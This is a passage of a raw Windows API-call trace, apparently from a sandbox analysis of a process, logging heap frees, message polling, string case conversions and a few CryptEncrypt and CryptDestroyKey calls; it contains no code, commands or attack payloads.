wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.200] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.200] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.201] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.201] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.205] CryptEncrypt (in: hKey=0xaa57e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0209.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.205] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0209.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.205] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.205] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.206] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.206] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.206] CryptEncrypt (in: hKey=0xaa57e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b17e8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b17e8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.206] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.206] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.207] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.207] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.207] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.207] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.207] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.207] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.209] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.209] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.209] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0209.209] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.209] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0209.209] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.209] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.209] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.209] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.209] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.209] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.209] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.210] CryptDestroyKey (hKey=0xaa57e0) returned 1 [0209.210] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.210] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.210] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.210] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.210] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.210] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.210] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.210] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.210] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.210] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.210] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.210] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.210] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.210] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.215] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.216] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.216] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.216] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.216] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.216] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.216] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.216] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.216] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.217] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.217] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.217] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.217] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.217] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.217] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.217] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.217] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.217] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.217] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.217] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 